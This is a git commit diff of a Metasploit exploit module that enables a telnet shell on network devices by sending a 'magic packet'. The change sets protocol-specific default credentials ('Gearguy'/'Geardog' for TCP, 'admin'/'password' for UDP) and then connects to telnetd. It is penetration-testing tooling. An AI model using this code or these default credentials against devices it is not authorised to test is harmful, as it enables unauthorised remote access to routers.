Use default creds specific to protocol

GSoC/Meterpreter_Web_Console
William Vu 2018-03-02 06:20:21 -06:00
parent 1f40afea9c
commit fba30d47a2
1 changed files with 26 additions and 11 deletions

View File

@ -39,9 +39,19 @@ class MetasploitModule < Msf::Exploit::Remote
}
},
'Targets' => [
['Automatic (detect TCP or UDP)', proto: :auto],
['TCP (typically older devices)', proto: :tcp],
['UDP (typically newer devices)', proto: :udp]
['Automatic (detect TCP or UDP)',
proto: :auto
],
['TCP (typically older devices)',
proto: :tcp,
username: 'Gearguy',
password: 'Geardog'
],
['UDP (typically newer devices)',
proto: :udp,
username: 'admin',
password: 'password'
]
],
'DefaultTarget' => 0
))
@ -49,13 +59,15 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([
Opt::RPORT(23),
OptString.new('MAC', [true, 'MAC address of device']),
OptString.new('USERNAME', [true, 'Username on device', 'Gearguy']),
OptString.new('PASSWORD', [true, 'Password on device', 'Geardog'])
OptString.new('USERNAME', [false, 'Username on device']),
OptString.new('PASSWORD', [false, 'Password on device'])
])
end
def exploit
@proto = target[:proto]
@username = datastore['USERNAME'] || target[:username]
@password = datastore['PASSWORD'] || target[:password]
# Detect TCP or UDP
if @proto == :auto
@ -71,6 +83,13 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
# Try to use default creds
unless @username && @password
tgt = targets.find { |t| t[:proto] == @proto }
@username = tgt[:username]
@password = tgt[:password]
end
# Shell it
exploit_telnetenabled
connect_telnetd
@ -79,11 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit_telnetenabled
# Generate the magic packet
print_status('Generating magic packet')
payload = magic_packet(
datastore['MAC'],
datastore['USERNAME'],
datastore['PASSWORD']
)
payload = magic_packet(datastore['MAC'], @username, @password)
# Send the magic packet via TCP or UDP
begin